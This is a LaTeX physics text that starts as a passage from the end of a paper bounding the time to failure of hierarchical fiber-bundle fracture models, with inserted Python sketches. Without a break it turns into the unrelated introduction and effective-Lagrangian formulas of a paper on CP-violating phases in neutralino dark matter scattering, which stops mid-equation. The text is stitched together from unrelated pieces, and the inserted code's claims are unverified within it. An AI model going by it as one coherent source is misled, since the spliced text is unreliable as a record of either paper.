surviving elements in the set. In the simplest scheme, called ELS for
equal load sharing, the load supported by failed elements is shared
equally among all surviving elements. Important from the geophysical
point of view is the hierarchical load-sharing (HLS) rule introduced
by Turcotte and collaborators in the seismological literature
\cite{smalley85}. In this load-transfer modality the scale invariance
of the fracture process is directly taken into account by means of a
scheme of load transfer following the branches of a fractal (Cayley)
tree with a fixed coordination number $c$. The HLS geometry nicely
simulates the Green's function associated with the elastic
redistribution of stress adjacent to a rupture. In the static case,
the strength of an HLS system tends to zero as the size of the system,
$N$, approaches infinity, though very slowly, as
\(1/\log(\log N)\) \cite{newman91}. The dynamic HLS model was introduced
in the geophysical literature in reference \cite{newman94}; their
specific aim was to find out if the chain of partial failure events
preceding the total failure of the set resembles a log-periodic
sequence \cite{sornette95}. In the analysis of \cite{newman94}, it
appeared that, contrary to the static model, the dynamic HLS model
seemed to have a non-zero time-to-failure as the size of the system
tends to infinity. In this paper we provide evidence that this
conjecture is true by means of an exact algebraic iterative method
where trees of
\(n\) levels, $N=c^n$, are solved using the information acquired in the previous
calculation of trees of \(n-1\) levels. As a byproduct of this method,
we obtain a rigorous lower bound for the time to failure of infinite
size sets, which turns out to be non-zero.
In \cite{gomez98} we showed how in fiber-bundle dynamical models,
using a Weibull exponential shape function and a power-law breaking
rule, one can devise a probabilistic approach which is equivalent to
the usual approach \cite{newman94} where the random lifetimes are
fixed at the beginning and the process evolves deterministically.
Without loss of generality, from the probabilistic perspective the set
of elements with initial individual loads \(\sigma=\sigma_0=1\) and
suffering successive casualties is equivalent to an inhomogeneous
sample of radioactive nuclei each with a decay width
\(\sigma^{\rho}\); \(\rho\) being the so called Weibull index, which
in materials science adopts typical values between 2 and 10. As time
passes and failures occur, loads are transferred,
\(\sigma\) changes and the decay widths of the surviving elements grow.
In the probabilistic approach, in each time step defined as:
\begin{equation}
\delta=\frac{1}{\sum\limits_{j}\sigma_{j}^{\rho}}\quad ,
\label{one}
\end{equation}
one element of the sample decays. The index \(j\) runs along all the
surviving elements. The probability of one specific element,
\(m\), to fail is \(p_{m}=\sigma_{m}^{\rho} \delta\). Eq.\ (\ref{one}) is the ordinary
link between the mean time interval for one element to decay in a
radioactive sample and the total decay width of the sample as defined
above. Due to this analogy, radioactivity terms will frequently be
used in this communication. Note that we use loads and times without
dimensions. The time to failure, \(T\), of a set is the sum of the
\(N\)
\(\delta\)s. For the ELS case, the value of \(\delta\) as defined in
Eq.\ (\ref{one}) easily leads to $T=1/\rho$, which is the correct
result for the time to failure of an infinite ELS set \cite{newman94}.
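This ELS result is easy to check numerically. Under equal load sharing the conserved total load $N$ is shared evenly, so after $k$ failures each of the $N-k$ survivors carries $N/(N-k)$ and Eq.\ (\ref{one}) gives $\delta_k=(N-k)^{\rho-1}/N^{\rho}$. The sketch below (our own illustration, not code from the original analysis) sums these steps and shows $T\to 1/\rho$ as $N$ grows:

```python
# Illustrative check (ours, not from the paper): time to failure of an
# equal-load-sharing (ELS) set of N elements with Weibull index rho.
def els_time_to_failure(N, rho):
    # After k failures the N-k survivors each carry load N/(N-k),
    # so delta_k = 1 / sum_j sigma_j^rho = (N-k)^(rho-1) / N^rho.
    return sum((N - k) ** (rho - 1) for k in range(N)) / N ** rho

for rho in (2, 3):
    print(rho, els_time_to_failure(1000, rho))  # approaches 1/rho
```

For $N=1$ the sum reduces to the single step $\delta_0=1$, matching the $n=0$ tree discussed below.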
In this communication we will apply these ideas to the HLS case
obtaining the
\(\delta\)s algebraically without having to use Monte Carlo
simulations.
To give a perspective of what is going on in the rupture process of a
hierarchical set we have drawn in Fig.\ \ref{figure1} the three
smallest cases for trees of coordination \(c=2\). Denoting by
\(n\) the number of levels, or height of the tree, i.e.
\(N=2^{n}\), we have considered \(n=0,1\) and
\(2\). The integers within parenthesis
\((r)\) account for the number of failures existing in the tree. When
there are several non-equivalent configurations corresponding to a
given
\(r\), they are labeled as \((r,s)\), i.e., we add a new index $s$.
The total load is conserved except at the end, when the tree
collapses. Referring to the high symmetry of loaded fractal trees,
note that each of the configurations explicitly drawn in Fig.\
\ref{figure1} represents all those that can be brought to coincidence
by the permutation of two legs joined at an apex, at any level in the
height hierarchy. Hence we call them non-equivalent configurations or
merely configurations. In general, each configuration $(r,s)$ is
characterized by its probability $p(r,s)$, $\sum\limits_{s}p(r,s)
=1$, and its decay width $\Gamma(r,s)$. The time step for one-element
breaking at the stage $r$, is given by
\begin{equation}
\delta_{r}=\sum\limits_{s}p(r,s)\frac{1}{\Gamma(r,s)} \label{two}
\end{equation}
This is the necessary generalization of Eq.\ (\ref{one}) due to the
appearance of non-equivalent configurations for the same $r$ during
the decay process of the tree. In cases of branching, the probability
that a configuration chooses a specific direction is equal to the
ratio between the partial decay width in that direction and the total
width of the parent configuration. We will compute at a glance the
\(\delta\)s of Fig.\ \ref{figure1} in order to later analyze the general
case. To be specific, we will always use \(\rho=2\). For
\(n=0\), we have $\Gamma(0)=1^{2}$ and \(\delta_{0}=\frac{1}{1^{2}}=1=T\).
For \(n=1\), \(\Gamma(0)=1^{2}+1^{2}=2\), $\delta_{0}=\frac{1}{2}$,
\(\Gamma(1)=2^{2}\), $\delta_{1}=\frac{1}{4}$ and hence \(T=\frac{1}{2}+\frac{1}{4}=\frac{3}{4}\). For \(n=2\),
\(\Gamma(0)=1^{2}+1^{2}+1^{2}+1^{2}=4\), \(\delta_{0}=\frac{1}{4}\),
\(\Gamma(1)=2^{2}+1^{2}+1^{2}=6\), $\delta_{1}=\frac{1}{6}$; now we face a branching,
the probability of the transition $(1)\rightarrow(2,1)$ is
$\frac{4}{6}$ and the probability of the transition
$(1)\rightarrow(2,2)$ is $\frac{2}{6}$, on the other hand
$\Gamma(2,1)=2^{2}+2^{2}=8=\Gamma(2,2)$, hence
$\delta_{2}=\frac{4}{6}\cdot\frac{1}{8}+\frac{2}{6}\cdot\frac{1}{8}=\frac{1}{8}$.
Finally $\delta_{3}=\frac{1}{16}$ and the addition of $\delta$s gives
$T=\frac{29}{48}$.
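The bookkeeping in this worked example can be automated. The sketch below is our own illustration (the state encoding and function names are ours, not the paper's): a configuration is stored as a nested tuple, a collapsed half is absorbed by doubling its sibling's loads, and the expected failure time adds $1/\Gamma$ at every one-element break weighted by the branching probabilities, which unrolls exactly to the sum of the $\delta_r$ of Eq.\ (\ref{two}):

```python
from fractions import Fraction
from functools import lru_cache

RHO = 2  # Weibull index used in the paper's worked example (power-law rule)

def build(n):
    """Perfect c=2 tree of height n; a leaf stores its (integer) load."""
    return ('L', 1) if n == 0 else (build(n - 1), build(n - 1))

def double(node):
    """Replica rule: a collapsed sibling doubles every surviving load."""
    if node is None:
        return None
    if node[0] == 'L':
        return ('L', 2 * node[1])
    return norm(double(node[0]), double(node[1]))

def norm(a, b):
    """Canonical configuration: absorb collapsed halves, sort symmetric legs."""
    if a is None and b is None:
        return None
    if a is None:
        return double(b)
    if b is None:
        return double(a)
    return tuple(sorted((a, b), key=str))

def breaks(node):
    """Yield (partial decay width, successor) for every one-element break."""
    if node[0] == 'L':
        yield node[1] ** RHO, None
        return
    a, b = node
    for w, a2 in breaks(a):
        yield w, norm(a2, b)
    for w, b2 in breaks(b):
        yield w, norm(a, b2)

@lru_cache(maxsize=None)
def T(node):
    """Exact time to failure: 1/Gamma per break, weighted by branch probabilities."""
    if node is None:
        return Fraction(0)
    trans = list(breaks(node))
    gamma = sum(w for w, _ in trans)  # total decay width of this configuration
    return Fraction(1, gamma) + sum(Fraction(w, gamma) * T(s) for w, s in trans)

for n in range(4):
    print(n, T(build(n)))
```

Exact rational arithmetic reproduces the values quoted in the text for the small trees.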
Now we define the replica of a configuration belonging to a given
\(n\), as the same configuration but with the loads doubled (this is
because we are using \(c=2\)). The replica of a given configuration
will be recognized by a prime sign. In other words $(r,s)'$ is the
replica of $(r,s)$. Any decay width, partial or total, related to
$(r,s)'$ is automatically obtained by multiplying the corresponding
value of $(r,s)$ by the common factor $c^{\rho}=2^{\rho}=4$. This is a
consequence of the power-law breaking rule assumed. The need to define
the replicas stems from the observation that any configuration
appearing in a stage of breaking $r$ of a given
\(n\), can be built as the juxtaposition of two configurations of
the level
\(n-1\), including also the replicas of the level $n-1$ as ingredients of the
game. In Fig.\ \ref{figure1}, one can observe the explicit structure
of the configurations of $N=4$ as a juxtaposition of those of $N=2$
and its replicas. From this perspective we notice that as the
configurations for the height $n$ are formed by juxtaposing two
configurations of the already solved height $n-1$ and its replicas,
with the restriction that the total load must be equal to $2^n$
because the total load is conserved, the single-element breaking
transitions occurring can only be of three types. One case a)
corresponds to the breaking of one element in a half of the tree while
the other half remains as an unaffected spectator. Another case b)
corresponds to the decay of the last surviving element in a half of
the tree, which provokes its collapse and the corresponding doubling
of the load borne by the other half. Finally, the third case c)
corresponds to the scenario in which one half of the tree has already
collapsed and in the other half one break occurs. In this third case
the decay width is obtained from the information of the replicas. This
holds for any height $n$, allows the computation of all the partial
decay widths in a tree of height $n$ from those obtained in the height
$n-1$ and will be illustrated in Fig.\ \ref{figure3}.
Using henceforth a convenient symbolic notation, in Fig.\
\ref{figure2}a we have built what we call the primary width diagram
for $n=3$ resulting from the juxtapositions of pairs of configurations
of the previous diagram of $n=2$ and its replicas. It is implicitly
understood that time flows downward along with the breaking process.
In Fig.\ \ref{figure2}a the boxes represent $n=3$ configurations, and
at their right, the two quantities in parentheses indicate the two
$n=2$ configurations forming them. The value of the partial width
connecting a parent and a daughter is written at the end of the
corresponding arrow. The sum of all the partial widths of a parent
configuration in a branching is always equal to the total decay width,
$\Gamma$, of the parent. From this primary width diagram one deduces
the probability of any primary configuration at any stage $r$ of
breaking, and consequently $\delta_{r}$ is obtained using Eq.\
(\ref{two}). Finally, by adding all the $\delta$s we calculate
$T(n=3)$. To illustrate the connection between the explicit
configurations as those of Fig.\ \ref{figure1} and the somewhat
hermetic notation of Fig.\ \ref{figure2}, in Fig.\ \ref{figure3}, we
have shown three explicit examples relating them. Fig.\ \ref{figure3}
is self-explanatory. The three examples correspond to the cases a), b)
and c) mentioned before.
By iterating this procedure, that is by forming the primary diagram of
the $n+1$ height by juxtaposing the configurations of the primary
diagram of the height $n$, we can, in principle, exactly obtain the
total time to failure of trees of successively doubled size. Two
examples are $T(n=3)=\frac{63451}{123200}$ and
$T(n=4)=\frac{21216889046182831}{46300977698976000}$. The problem
arises from the vast amount of configurations one has to handle in the
successive primary diagrams. This fact eventually blocks the
possibility of obtaining exact results for trees high enough as to be
able to gauge the asymptotic behavior of $T$ in HLS sets. That is why,
taking advantage of the general perspective gained with the exact
algebraic method, henceforth our more modest goal will be to set
rigorous bounds for $T$. This task is much simpler.
To set bounds, we will define effective diagrams in which for each $r$
there is only one configuration which results from fusing in some
specific appropriate way all the configurations labeled by the
different $s$ values; see Fig.\ \ref{figure2}b. These effective
configurations are connected by effective decay widths denoted by
$a_r$. Thus, the effective diagram for any $n$ is calculated from its
primary diagram, and then is used to build a primary diagram of the
next height $n+1$. For $n=0$, 1 and 2, $a_r=\Gamma(r)$ because
$\forall r$, the $\Gamma(r,s)$ are equal to a unique value
$\Gamma(r)$. The point is how to define $a_r$ for $n\ge 3$, so that
all the $\delta_r$ $(n\ge4)$ and hence $T(n\ge4)$ are systematically
lower (or higher) than their exact results. This goal is easily
accomplished using,
\begin{equation}
a_r=\Gamma_{\rm max}(r)\qquad ({\rm or}\quad \Gamma_{\rm min}(r)) \label{three}
\end{equation}
i.e., by assuming that the configuration of maximum (minimum) width
saturates the single-element decay of the stage $r$. Tighter rigorous
bounds are obtained using the geometric mean (or the harmonic
mean), namely
\begin{equation}
a_r=\prod\limits_{s}\Gamma(r,s)^{p(r,s)}\qquad ({\rm or}\quad
\frac{1}{\sum\limits_{s}p(r,s)\frac{1}{\Gamma(r,s)}})
\label{four}
\end{equation}
The bounds obtained from these formulae are plotted in Fig.\
\ref{figure4}. It is clear that those based on Eq.\ (\ref{three}) are
poor, in fact the lower bound goes quickly to zero. On the other hand,
those based on Eq.\ (\ref{four}) are stringent and useful. The value
obtained for the lower (higher) bound to $T$, from Eq.\ (\ref{four}),
will be called $T_l$ $(T_h)$. The arithmetic mean, i.e.,
$a_r=\sum\limits_{s}p(r,s)\cdot\Gamma(r,s)$ also leads to a lower
bound but it is not as good as that coming from the geometric mean.
The bounds emerging from these three means are rigorous because when
configurations of different decay width are fused, the function
appearing in the calculation of the $\delta$s is
concave (convex). This will be explained elsewhere.
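The ordering behind these choices is the classical chain harmonic mean $\le$ geometric mean $\le$ arithmetic mean for the weighted widths, which is easy to illustrate numerically (the widths and probabilities below are made-up sample values, not data from the primary diagrams):

```python
import math

# Hypothetical widths Gamma(r,s) and probabilities p(r,s) at one stage r.
gammas = [6.0, 8.0, 12.0]
probs = [0.5, 0.3, 0.2]  # must sum to 1

harmonic = 1.0 / sum(p / g for p, g in zip(probs, gammas))
geometric = math.prod(g ** p for p, g in zip(probs, gammas))
arithmetic = sum(p * g for p, g in zip(probs, gammas))

# Effective widths built from these means satisfy HM <= GM <= AM, which is
# why the two choices in Eq.(4) bracket the exact delta_r from both sides.
print(harmonic, geometric, arithmetic)
```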
We have fitted the data points of $T_l$ by an exponential function of
the form \(T_{l}=T_{l,\infty}+a e^{-b(n-n_{0})}\),
\(T_{l,\infty}\), \(a\), \(b\) and \(n_{0}\) being fitting parameters.
The success of this fitting is crucial because this exponential decay
to a non-zero limit is the hallmark of our claim. By choosing subsets
formed only by points representing big systems we observe a clear
saturation of the asymptotic time-to-failure towards
\(T_{l,\infty}=0.32537\pm0.00001\). An analogous analysis of $T_h$
leads to $T_{h,\infty}=0.33984\pm0.00001$. Similar fittings of the
Monte Carlo data points are inconclusive, due to the intrinsic
noisiness of the MC results and the limited size of the simulated sets
($N<2^{16}$ elements). What this result implies is that a system with
a hierarchical scheme of load transfer and a power-law breaking rule
$(c=2,\rho=2)$ has a time-to-failure for sets of infinite size,
$T_{\infty}$, such that $0.32537 \leq T_{\infty} \leq 0.33984$. Thus,
there is an associated zero-probability of failing for $T<T_{\infty}$
and a probability equal to one of failing for
\(T>T_{\infty}\). The critical point behavior is thus confirmed.
Invoking conventional universality arguments one deduces that this
property holds for a hierarchical structure of any coordination. The
case of dynamical HLS sets using an exponential breaking rule will be
reported shortly.
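For a sequence of the assumed form $T_{l}=T_{l,\infty}+a e^{-b(n-n_{0})}$ the asymptote can also be estimated without a nonlinear fit, e.g.\ by Aitken's $\Delta^{2}$ extrapolation, which is exact for a purely geometric approach to the limit. The sketch below is our own illustration, run on synthetic data of that form rather than on the bounds computed above:

```python
import math

def aitken(y):
    """Aitken delta-squared estimate of the limit from the last three terms."""
    d2 = y[-1] - 2 * y[-2] + y[-3]
    return y[-1] - (y[-1] - y[-2]) ** 2 / d2

# Synthetic sequence of the fitted form T_inf + a*exp(-b*n); made-up numbers.
T_inf, a, b = 0.325, 0.4, 0.6
seq = [T_inf + a * math.exp(-b * n) for n in range(1, 9)]
print(aitken(seq))  # recovers T_inf exactly for a geometric approach
```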
A.F.P is grateful to J. As\'{\i}n, J.M. Carnicer and L. Moral for
clarifying discussions. M.V-P. thanks Diego V\'{a}zquez-Prada for
discussions. Y.M thanks the AECI for financial support. This work was
supported in part by the Spanish DGICYT.
\section{INTRODUCTION}
Supersymmetric theories with R parity conservation imply the
existence of a lowest mass supersymmetric particle (LSP) which is
absolutely stable\cite{jungman}. In supergravity models\cite{applied}
with R parity invariance one finds that over
a majority of the parameter space the LSP is the lightest neutralino,
and thus the neutralino becomes
a candidate for cold dark matter (CDM) in the universe. A great deal
of dark matter exists in the halo of our galaxy and estimates of the
density of dark matter in our solar neighborhood give densities of
0.3GeV/cm$^3$ and particle velocities of $\approx 320 kms^{-1}$.
One of the interesting suggestions regarding the detection of dark
matter is that of direct detection via scattering of neutralinos
from target nuclei in terrestrial detectors\cite{good}.
Considerable progress has
been made in both technology of detection\cite{santa} as well as in accurate
theoretical predictions of the expected event rates in detectors such
as Ge, NaI, CaF$_2$, and Xe\cite{flores,drees,events,arno}.
In this paper we discuss the effects of CP violating phases in
supersymmetric theories on event rates in the scattering of neutralinos
off nuclei in terrestrial detectors. Such effects are negligible if
the CP violating phases are small. Indeed the stringent experimental
constraints on the EDM of the neutron\cite{altra} and of the
electron \cite{commins} would seem to require
either small CP violating phases\cite{bern}
or a
heavy supersymmetric particle
spectrum\cite{na}, in the range of several TeV, to satisfy the experimental
limits on the EDMs. However, a heavy sparticle spectrum also
constitutes fine tuning\cite{ccn} and further a heavy
spectrum in the range of several TeV will put the supersymmetric
particles beyond the reach of even the LHC.
Recently a new possibility was proposed\cite{in1,in2,correction},
i.e., that of internal cancellations among the various components
contributing to
the EDMs which allows for the existence of large CP violating phases,
with a SUSY spectrum which is not excessively heavy and is thus accessible
at colliders in the near future.
CP violating phases of O(1) are attractive
because they circumvent the naturalness problem associated with small
phases or a heavy SUSY spectrum.
The EDM analysis of Ref.\cite{in1} was for the minimal supergravity model
which has only two CP violating phases. The analysis of
Ref.\cite{in1} was extended in Ref.\cite{in2} to take account of
all allowed
CP violating phases in the Minimal Supersymmetric Standard Model (MSSM)
with no generational mixing. This extension gives
the possibility of the cancellation mechanism to occur over a
much larger region of the parameter space allowing for
large CP violating phases over this region. Indeed a general numerical
analysis bears this out\cite{bgk}.
Large CP violating phases can affect significantly
dark matter analyses and other phenomena at low
energy\cite{falk1,bk,falk2,falk3}. A detailed analysis in Ref.\cite{falk2}
shows that large CP violating phases consistent with the cosmological
relic density constraints and the EDM constraints using the
cancellation mechanism are indeed
possible. CP violating phases affect event rates in dark
matter detectors and a partial analysis of these
effects with two CP phases and without the EDM
constraint was given
in Ref.\cite{falk3}.
Thus, currently there are no analyses where the effect of large
CP violating phases on event rates and the simultaneous satisfaction
of the EDM constraints via the cancellation mechanism are discussed.
Further, the previous analyses are all limited to two CP violating
phases while supergravity models with non-universalities and MSSM
can possess many more phases\cite{in2}.
In this paper we give the first complete analytic analysis of the effects of
CP violation on event rates with the inclusion of all CP
violating phases allowed in the minimal supersymmetric standard
model (MSSM) when intergenerational
mixings are ignored. We then give a numerical analysis of the
CP violating effects on event rates with the inclusion of the EDM constraints.
It is shown that while the effects of CP violating phases on event rates
are significant when the EDM constraints are included, they are not
as large as in the case when the EDM constraints are ignored.
We discuss now the details of the analysis in MSSM. The nature of the
LSP at the electro-weak scale is determined by the neutralino
mass matrix which in the basis ($\tilde B$, $\tilde W$, $\tilde H_1$,
$\tilde H_2$), where $\tilde B$ and $\tilde W$ are the U(1) and
the neutral SU(2) gauginos, is given by
\begin{equation}
\left(\matrix{|\m1|e^{i\xi_1}
& 0 & -M_z\sin\theta_W\cos\beta e^{-i\chi_1} & M_z\sin\theta_W\sin\beta e^{-i\chi_2} \cr
0 & |\m2| e^{i\xi_2} & M_z\cos\theta_W\cos\beta e^{-i \chi_1}& -M_z\cos\theta_W\sin\beta e^{-i\chi_2} \cr
-M_z\sin\theta_W\cos\beta e^{-i \chi_1} & M_z\cos\theta_W\cos\beta e^{-i\chi_1} & 0 &
-|\mu| e^{i\theta_{\mu}}\cr
M_z\sin\theta_W\sin\beta e^{-i \chi_2} & -M_z\cos\theta_W\sin\beta e^{-i \chi_2}
& -|\mu| e^{i\theta_{\mu}} & 0}
\right)
\end{equation}
Here $M_Z$ is the Z boson mass, $\theta_W$ is the weak angle,
$\tan\beta=|v_2/v_1|$ where $v_i=\langle H_i\rangle=|v_i|e^{i\chi_i}$
(i=1,2), where $H_2$ is the Higgs that
gives mass to
the up quarks and $H_1$ is the Higgs that gives mass to
the down quarks and the leptons, $\mu$ is the Higgs
mixing parameter (i.e. it appears in the superpotential as the
term $\mu H_1H_2$),
$\m1$ and $\m2$ are the masses of the U(1) and SU(2) gauginos at
the electro-weak scale with $\xi_1$ and $\xi_2$ being their phases.
The
neutralino mass matrix of Eq.(1) contains several phases.
However, it can be shown \cite{in2}
that the eigenvalues
and the eigenvectors of the neutralino mass matrix
depend on only two combinations: $\theta$=
$\frac{\xi_1+\xi_2}{2}$+$\chi_1$ +$\chi_2$+$\theta_{\mu}$
and $\Delta \xi$=$(\xi_1-\xi_2)$.
The neutralino matrix can be
diagonalized by a unitary matrix X such that
\begin{equation}
X^T M_{\chi^0} X={\rm diag}(\mx1, \mx2, \mx3, \mx4)
\end{equation}
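Numerically, Eq.(2) is a Takagi (rather than an ordinary unitary-similarity) diagonalization, since the Majorana mass matrix is complex symmetric. One standard construction goes through the singular value decomposition; the sketch below is our own illustration, and the parameter values are assumed sample inputs, not fits:

```python
import numpy as np

def takagi(M):
    """Return X, m with X.T @ M @ X = diag(m), m >= 0, for complex symmetric M."""
    U, S, Vh = np.linalg.svd(M)
    # For symmetric M with non-degenerate singular values, U^dag conj(V) is a
    # diagonal unitary D; absorbing sqrt(D) into U symmetrizes M = Ut S Ut^T.
    d = np.diag(U.conj().T @ Vh.T)
    Ut = U @ np.diag(np.sqrt(d))
    return Ut.conj(), S  # X = conj(U_takagi)

# Illustrative parameter values (GeV, radians) -- assumptions, not fits.
m1, m2, mu, MZ = 80.0, 160.0, 300.0, 91.19
sw, cw = np.sqrt(0.23), np.sqrt(0.77)
beta = np.arctan(2.0)
xi1, xi2, thmu, chi1, chi2 = 0.4, 0.7, 0.5, 0.1, 0.2
cb, sb = np.cos(beta), np.sin(beta)
a, c = MZ * sw, MZ * cw
M = np.array([
    [m1*np.exp(1j*xi1), 0, -a*cb*np.exp(-1j*chi1),  a*sb*np.exp(-1j*chi2)],
    [0, m2*np.exp(1j*xi2),  c*cb*np.exp(-1j*chi1), -c*sb*np.exp(-1j*chi2)],
    [-a*cb*np.exp(-1j*chi1), c*cb*np.exp(-1j*chi1), 0, -mu*np.exp(1j*thmu)],
    [a*sb*np.exp(-1j*chi2), -c*sb*np.exp(-1j*chi2), -mu*np.exp(1j*thmu), 0]])

X, masses = takagi(M)
print(masses)  # non-negative mass eigenvalues, in descending order
```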
We shall denote the LSP by the index 0 so that
\begin{equation}
\chi^0=X_{10}^*\tilde B+X_{20}^*\tilde W+ X_{30}^*\tilde H_1+
X_{40}^*\tilde H_2
\end{equation}
The basic interactions that enter in the scattering of the LSP from
nuclei are the neutralino-squark-quark interactions in the s channel
and the neutralino-neutralino-Z(Higgs) interactions in the cross channel.
The squark mass matrix $M_{\tilde{q}}^2$
involves both the phases of $\mu$ and
of the trilinear couplings as given below
\begin{equation}
\left(\matrix{M_{\tilde{Q}}^2+m{_q}^2+M_{z}^2(\frac{1}{2}-Q_q
\sin^2\theta_W)\cos2\beta & m_q(A_{q}^{*}m_0-\mu R_q) \cr
m_q(A_{q} m_0-\mu^{*} R_q) & M_{\tilde{U}
}^2+m{_q}^2+M_{z}^2 Q_q \sin^2\theta_W \cos2\beta}
\right)
\end{equation}
Here $Q_q=2/3\,(-1/3)$ for q=u(d) and $R_q=v_1/v_2^*\, (v_2/v_1^*)$
for q=u(d),
and $m_q$ is the quark mass.
The squark matrix is diagonalized by $D_{qij}$ such that
\begin{equation}
D_{q}^\dagger M_{\tilde{q}}^2 D_q={\rm diag}(M_{\tilde{q}1}^2,
M_{\tilde{q}2}^2)
\end{equation}
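The $2\times2$ Hermitian diagonalization of Eq.(5) can be carried out with any standard eigensolver. The sketch below is our own illustration with assumed sample numbers (GeV$^2$) standing in for the entries of Eq.(4):

```python
import numpy as np

# Illustrative squark mass-squared matrix in GeV^2; the numbers are assumed
# sample values, with a complex LR entry playing the role of
# m_q (A_q^* m_0 - mu R_q).  The matrix is Hermitian by construction.
off = 175.0 * (500.0 - 300.0 * np.exp(1j * 0.5))
Msq = np.array([[250000.0, off],
                [np.conj(off), 160000.0]])

w, Dq = np.linalg.eigh(Msq)  # w ascending; columns of Dq are eigenvectors
# Dq^dagger @ Msq @ Dq is then diag(M_{q1}^2, M_{q2}^2), as in Eq.(5).
print(w)
```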
As mentioned in the introduction the relative velocities of the LSP
hitting the targets are small, and consequently we can approximate
the effective
interaction governing the neutralino-quark scattering by an
effective four-fermi interaction. We give now the result of our
analysis including all the relevant CP violating effects in a
softly broken MSSM. The effective four-fermi
interaction is given by
\begin{eqnarray}
{\cal L}_{eff}=\bar{\chi}\gamma_{\mu} \gamma_5 \chi \bar{q}
\gamma^{\mu} (A P_L +B P_R) q+ C\bar{\chi}\chi m_q \bar{q} q
+D \bar{\chi}\gamma_5\chi m_q \bar{q}\gamma_5 q\nonumber\\
+E\bar{\chi}i\gamma_5\chi m_q \bar{q} q
+F\bar{\chi}\chi m_q \bar{q}i\gamma_5 q
\end{eqnarray}
where our choice of the metric is $\eta_{\mu\nu}=(1,-1,-1,-1)$.
The deduction of Eq.(6) starting from the microscopic supergravity
Lagrangian is given in Appendix A. Here we give the results.
The first two terms ($A$, $B$) are spin-dependent interactions and arise
from the $Z$ boson and the sfermion exchanges. For these our analysis gives
\begin{equation}
A=\frac{g^2}{4 M^2_W}[|X_{30}|^2-|X_{40}|^2][T_{3q}-
e_q sin^2\theta_W]
-\frac{|C_{qR}|^2}{4(M^2_{\tilde{q1}}-M^2_{\chi})}
-\frac{|C^{'}_{qR}|^2}{4(M^2_{\tilde{q2}}-M^2_{\chi})}
\end{equation}
\begin{equation}
B=-\frac{g^2}{4 M^2_W}[|X_{30}|^2-|X_{40}|^2]
e_q sin^2\theta_W +
\frac{|C_{qL}|^2}{4(M^2_{\tilde{q1}}-M^2_{\chi})}
+\frac{|C^{'}_{qL}|^2}{4(M^2_{\tilde{q2}}-M^2_{\chi})}
\end{equation}
where
\begin{equation}
C_{qL}=\sqrt{2} (\alpha_{q0} D_{q11} -\gamma_{q0} D_{q21})
\end{equation}
\begin{equation}
C_{qR}=\sqrt{2} (\beta_{q0} D_{q11} -\delta_{q0} D_{q21})
\end{equation}
\begin{equation}
C^{'}_{qL}=\sqrt{2} (\alpha_{q0} D_{q12} -\gamma_{q0} D_{q22})
\end{equation}
\begin{equation}
C^{'}_{qR}=\sqrt{2} (\beta_{q0} D_{q12} -\delta_{q0} D_{q22})
\end{equation}
and where $\alpha$, $\beta$, $\gamma$, and $\delta$ are given by\cite{falk4}
\begin{equation}
\alpha_{u(d)j}=\frac{g m_{u(d)}X_{4(3)j}}{2 m_W\sin\beta(\cos\beta)}
\end{equation}
\begin{equation}
\beta_{u(d)j}=eQ_{u(d)j}X'^{*}_{1j}+\frac{g}{cos\theta_W}X'^{*}_{2j}
(T_{3u(d)}-Q_{u(d)}\sin^2\theta_W)
\end{equation}
\begin{equation}
\gamma_{u(d)j}=eQ_{u(d)j}X'_{1j}-
\frac{gQ_{u(d)}\sin^2\theta_W}{cos\theta_W}X'_{2j}
\end{equation}
\begin{equation}
\delta_{u(d)j}= \frac{- g m_{u(d)}X^*_{4(3)j}}{2 m_W\sin\beta(\cos\beta)}
\end{equation}
Here g is the $SU(2)_L$ gauge coupling and
\begin{equation}
X'_{1j}=X_{1j}\cos\theta_W+X_{2j}\sin\theta_W
\end{equation}
\begin{equation}
X'_{2j}=-X_{1j}\sin\theta_W+X_{2j}\cos\theta_W
\end{equation}
The effects of the CP violating phases enter via the neutralino
eigenvector components $X_{ij}$
and via the matrix $D_{qij}$
that diagonalizes the squark mass matrix.
The C term in Eq.(6) represents the scalar interaction which gives rise to
coherent scattering. It receives contributions from the sfermion
exchange, from the CP even light Higgs ($h^0$) exchange, and from the
CP even heavy Higgs ($H^0$) exchange. Thus
\begin{equation}
C=C_{\tilde{f}}+C_{h^0}+C_{H^0}
\end{equation}
where
\begin{equation}
C_{\tilde{f}}(u,d)= -\frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q1}}-M^2_{\chi}} Re[C_{qL}C^{*}_{qR}]
-\frac{1}{4m_q}\frac{1}
{M^2_{\tilde{q2}}-M^2_{\chi}} Re[C^{'}_{qL}C^{'*}_{qR}]
\end{equation}
\begin{eqnarray}
C_{h^0}(u,d)=-(+)\frac{g^2}{4 M_W M^2_{h^0}}
\frac{\cos\alpha\,(\sin\alpha)}{\sin\beta\,(\cos\beta)}\, {\rm Re}\,\sigma
\end{eqnarray}
\begin{eqnarray}
C_{H^0}(u,d)=
\frac{g^2}{4 M_W M^2_{H^0}}
\frac{\sin\alpha\,(\cos\alpha)}{\sin\beta\,(\cos\beta)}\, {\rm Re}\,\rho
\end{eqnarray}
Here $\alpha$ is the Higgs mixing angle,
(u,d) indicate the flavor of the quark
involved in the scattering, and $\sigma$ and $\rho$ are
defined by
\begin{equation}
\sigma=
X_{40}^*(X_{20}^*-\tan\theta_W X_{10}^*)\cos\alpha
+X_{30}^*(X_{20}^*-\tan\theta_W X_{10}^*)\sin\alpha
\end{equation}
\begin{equation}
\rho=
- X_{40}^*(X_{20}^*-\tan\theta_W X_{10}^*)\sin\alpha
+X_{30}^*(X_{20}^*-\tan\theta_W X_{10}^*)\cos\alpha
\end{equation}
The last three terms D,E and F in eq.(6) are given by
\begin{equation}
D(u,d)= C_{\tilde{f}}(u,d)
+\frac{g^2}{4M_W}\frac{\cot\beta\,(\tan\beta)}{m_{A^0}^2}\,{\rm Re}\,\omega
\end{equation}
\begin{eqnarray}
E(u,d)=T_{\tilde{f}}(u,d)+
\frac{g^2}{4M_W} [
-(+) \frac{\cos\alpha\,(\sin\alpha)}
{\sin\beta\,(\cos\beta)} \frac{{\rm Im}\,\sigma} {m_{h^0}^2}
+\frac{\sin\alpha\,(\cos\alpha)}
{\sin\beta\,(\cos\beta)}\frac{{\rm Im}\,\rho}{m_{H^0}^2} ]
\end{eqnarray}
\begin{eqnarray}
F(u,d)=T_{\tilde{f}}(u,d)
+\frac{g^2}{4M_W} \frac{\cot\beta\,(\tan\beta)}{m_{A^0}^2}\,
{\rm Im}\,\omega
\end{eqnarray}
where $A^0$ is the CP odd Higgs and where $\omega$ is defined by
\begin{equation}
\omega=
-X_{40}^*(X_{20}^*-\tan\theta_W X_{10}^*)\cos\beta
